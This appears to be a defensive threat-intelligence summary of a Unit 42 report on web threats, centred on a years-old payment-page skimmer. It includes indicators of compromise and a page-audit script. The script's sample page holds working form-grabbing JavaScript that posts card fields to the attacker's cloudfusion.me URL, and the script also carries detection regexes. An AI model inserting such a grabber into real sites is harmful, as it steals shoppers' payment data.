Trends in Web Threats: Old Web Skimmer Still Active Today

Palo Alto Networks analyzes trends in web threats by examining malicious landing and host URLs, including where they are hosted, their categories, and associated malware families, with a focus on cryptominers, JS downloaders, web skimmers, and redirects. The report also details a long-running web skimmer that remains active across multiple sites, illustrating that old threats can persist for years and emphasizing the need for continued protection and user caution. #WebSkimmer #Cloudfusion #jquery.min.js #cryptominer #JSDownloader

Keypoints

  • January–March 2022 saw 577,275 landing URL incidents (116,643 unique) and 2,043,862 malicious host URL incidents (180,370 unique).
  • Malicious landing URLs originated from 22,279 unique domains, with the United States leading, followed by Germany and Russia, often via proxies or VPNs.
  • Landing URLs tended to target business/economy sites, personal sites/blogs, and shopping sites, showing attackers’ tendency to exploit seemingly benign sites.
  • Top web threats were cryptominers, JavaScript downloaders, web skimmers, web scams, and JS redirectors, with JS downloaders most active early in 2022.
  • The web skimmer case study details a threat that has been active for five years: it injects lightly obfuscated JS into payment pages, collects form inputs, and exfiltrates the data to cloudfusion.me.
  • Protection relies on Advanced URL Filtering and Threat Prevention; users should exercise caution and organizations should monitor for ongoing web threats and mobile/online payment page integrity.

MITRE Techniques

  • [T1189] Drive-by Compromise – Malicious landing URLs provide an opportunity for a user to click a malicious link. ‘a malicious landing URL … that provides an opportunity for a user to click a malicious link’
  • [T1056.003] Web Form Grabbing – The skimmer collects inputs from the page’s input/select elements and other sensitive information when the button is clicked. ‘The code collects the inputs from the input and select elements (as well as other sensitive information from customers) when the button is clicked.’
  • [T1059.007] JavaScript – JavaScript is used to host/execute the malicious code, including lightly obfuscated scripts. ‘into the target web page with a lightly obfuscated JS code’
  • [T1041] Exfiltration Over C2 Channel – Exfiltration of stolen data to a remote server controlled by the attacker. ‘The code then sends that information to the remote collection server, https://cloudfusion[.]me/cdn/jquery.min.js, which is controlled by the attacker.’
  • [T1027] Obfuscated/Compressed Files and Information – Use of obfuscated JavaScript to hide malicious behavior. ‘lightly obfuscated JS code’
  • [T1496] Resource Hijacking – Cryptominer activity represents unauthorized use of resources. ‘The top five web threats we observed are cryptominers, JavaScript (JS) downloaders, web skimmers, web scams and JS redirectors.’
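The behaviour mapped above (an injected external script plus inline code that reads input/select fields on a button click and posts them to the collection URL) can be checked for on a shop's own checkout pages. The script below is an added example, not Unit 42 code: it assumes a constructed allowlist of approved script origins and a constructed sample page, and uses the report's cloudfusion.me IoC as the only known-bad host.

```python
"""Audit a checkout page's scripts for the skimmer pattern the report describes.
Added example, not Unit 42 code; the allowlist and sample page are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse
ALLOWED_SCRIPT_HOSTS = {"code.jquery.com"}  # assumption: the shop's approved script origins
KNOWN_BAD_HOSTS = {"cloudfusion.me"}        # exfiltration domain from the report's IoC list

class ScriptCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)

def audit(html):
    p = ScriptCollector()
    p.feed(html)
    findings = []  # (finding, evidence) pairs; empty means nothing suspicious
    for src in p.external:
        host = urlparse(src).hostname or ""  # relative src is same-origin and not flagged
        if host in KNOWN_BAD_HOSTS:
            findings.append(("known_skimmer_host", src))
        elif host and host not in ALLOWED_SCRIPT_HOSTS:
            findings.append(("unlisted_script_host", src))
    for body in p.inline:  # form grabbing = reading input/select fields + a way to send them
        reads = re.search(r"querySelectorAll\(\s*[\"'](?:input|select)", body)
        sends = re.search(r"\b(?:fetch|XMLHttpRequest|sendBeacon|new Image)\b", body)
        if reads and sends:
            findings.append(("inline_form_grabber", body.strip()[:40]))
    return findings

# Constructed page: legitimate jQuery, the report's skimmer URL, and an inline grabber.
SAMPLE_PAGE = """<form><input name="card"><select name="exp"></select><button id="pay">Pay</button></form>
<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
<script src="https://cloudfusion.me/cdn/jquery.min.js"></script>
<script>document.getElementById("pay").onclick = function () { var d = {};
  document.querySelectorAll("input, select").forEach(function (e) { d[e.name] = e.value; });
  fetch("https://cloudfusion.me/cdn/jquery.min.js", {method: "POST", body: JSON.stringify(d)}); };</script>"""
```

Running `audit(SAMPLE_PAGE)` reports the known skimmer host and the inline grabber while leaving the allowlisted jQuery copy alone; in practice the allowlist should be generated from a known-good baseline of the page and the audit run on a schedule so that a newly injected script shows up as a diff.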

Indicators of Compromise

  • [SHA256] Malicious web skimmer hashes – 79eedf9c1b974992a4beada1bd6343ecadece0b413acccd4deded4a49a4ad220, 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f
  • [Domain] Malicious hosting domains – cloudfusion.me, voques-tfr.xyz, misuperblog.com, yhys93.site
  • [IP] Malicious hosting IPs – 198.54.117.197, 198.54.117.198, 198.54.117.199, 198.54.117.200
  • [URL] Remote collection/exfiltration URL – https://cloudfusion.me/cdn/jquery.min.js
  • [File Name] Web skimmer payload file – jquery.min.js

Read more: https://unit42.paloaltonetworks.com/web-threat-trends-web-skimmer/